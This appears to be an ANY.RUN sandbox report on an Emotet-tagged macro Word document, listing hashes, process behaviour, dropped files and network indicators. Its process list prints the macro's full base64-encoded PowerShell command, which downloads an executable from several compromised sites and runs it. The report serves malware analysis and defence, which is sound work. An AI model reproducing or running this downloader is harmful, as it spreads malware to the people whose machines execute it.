File name:

TheG0df2ther@Emotet.doc

Full analysis: https://app.any.run/tasks/21c57cce-bb34-4056-9a44-92927a9655a9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: November 21, 2021, 19:15:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

B92021CA10AED3046FC3BE5AC1C2A094

SHA1:

0FB1AD5B53CDD09A7268C823EC796A6E623F086F

SHA256:

C378387344E0A552DC065DE6BFA607FD26E0B5C569751C79FBF9C6F2E91C9807

SSDEEP:

3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2152)

    • PowerShell script executed

      • powershell.exe (PID: 2152)

    • Checks supported languages

      • powershell.exe (PID: 2152)

    • Creates files in the user directory

      • powershell.exe (PID: 2152)

    • Reads the computer name

      • powershell.exe (PID: 2152)

    • Reads the date of Windows installation

      • powershell.exe (PID: 2152)

    • Reads Environment values

      • powershell.exe (PID: 2152)

    • Executes application which crashes

      • powershell.exe (PID: 2152)

  • INFO

    • Checks supported languages

      • WINWORD.EXE (PID: 3296)
      • ntvdm.exe (PID: 968)

    • Reads the computer name

      • WINWORD.EXE (PID: 3296)

    • Reads mouse settings

      • WINWORD.EXE (PID: 3296)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3296)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2152)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3296)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x247a0b47
ZipCompressedSize: 524
ZipUncompressedSize: 3939
ZipFileName: [Content_Types].xml

XMP

Title: -
Subject: -
Creator: -
Description: -

XML

Keywords: -
LastModifiedBy: -
RevisionNumber: 1
CreateDate: 2019:09:16 12:22:00Z
ModifyDate: 2019:09:16 12:22:00Z
Template: Normal.dotm
TotalEditTime: -
Pages: 1
Words: 66
Characters: 380
Application: Microsoft Office Word
DocSecurity: None
Lines: 3
Paragraphs: 1
ScaleCrop: No
Company: -
LinksUpToDate: No
CharactersWithSpaces: 445
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
968"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntvdm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2152powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
3296"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\TheG0df2ther@Emotet.doc.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events
8 309
Read events
7 487
Write events
692
Delete events
130

Modification events

(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:|&<
Value:
7C263C00E00C0000010000000000000000000000
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(3296) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
3
Text files
40
Unknown types
3

Dropped files

PID
Process
Filename
Type
3296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR166D.tmp.cvr
MD5:
SHA256:
3296WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
3296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$eG0df2ther@Emotet.doc.docmpgc
MD5:
SHA256:
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A229ABAE.datimage
MD5:35428803E94ECDFA6A957382868444DA
SHA256:73B03956B8DD27BFD4F7A828A7654456D6952E4C75AA03CF3F5050EEE366BCAE
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AA0FCA0.datimage
MD5:B2B55276284D41BAA290155CB55A94E2
SHA256:C08D5EC45948BDE7FBA129C2BD1A6BF2816015DA7BC0B8BC76DE8F8F3727D2CD
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A830BD7.wmfimage
MD5:A53FD310182B8DA14BE0E22A440105EA
SHA256:52A469268392E4252E6EF7F8D42BE5F6A02BE7C3383E5E71D94E0789591FF1DC
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1D90E5B.wmfimage
MD5:8436C2235EB1BBD97ADF43E95FD02CE8
SHA256:48F88EC1E3A36BC969EFBDD8E6A12D66EF8CFCF6B247708B018DE21DF2A6615F
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7E29814.datimage
MD5:48D1B152FC6F014B9C45DBB5A7941F4D
SHA256:61CBDA84CEB5254E134CB6F59EA9D73812B48EF380298D53AEE6CC09BAA966F3
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\375E43EC.datimage
MD5:B968160E32B2FBEBB3FF6C55F5B4885B
SHA256:7CF4AE188785F7C0E5E4A1D5BDAC0B52BC65D3AA46513022A9E35489765C19C9
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F68300F.wmfimage
MD5:4231CD6127B492249EF1FA93BCBA6BB8
SHA256:1389D62DCA5FFC19C8D28DB7028580016545EBB7C72714A08331A31F8CC6439E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
7
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2152
powershell.exe
GET
200
208.91.197.27:80
http://blockchainjoblist.com/wp-admin/014080/
US
html
18.0 Kb
malicious
2152
powershell.exe
GET
301
173.198.248.218:80
http://www.deepikarai.com/bangalore-escorts.php
US
html
256 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2152
powershell.exe
208.91.197.27:80
blockchainjoblist.com
Confluence Networks Inc
US
malicious
2152
powershell.exe
78.41.204.28:443
yeuquynhnhai.com
Snel.com B.V.
NL
malicious
2152
powershell.exe
173.198.248.218:443
deepikarai.com
Turnkey Internet Inc.
US
unknown
2152
powershell.exe
173.198.248.218:80
deepikarai.com
Turnkey Internet Inc.
US
unknown

DNS requests

Domain
IP
Reputation
blockchainjoblist.com
  • 208.91.197.27
malicious
womenempowermentpakistan.com
malicious
atnimanvilla.com
malicious
yeuquynhnhai.com
  • 78.41.204.28
malicious
deepikarai.com
  • 173.198.248.218
suspicious
www.deepikarai.com
  • 173.198.248.218
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
TheG0df2ther@Emotet.doc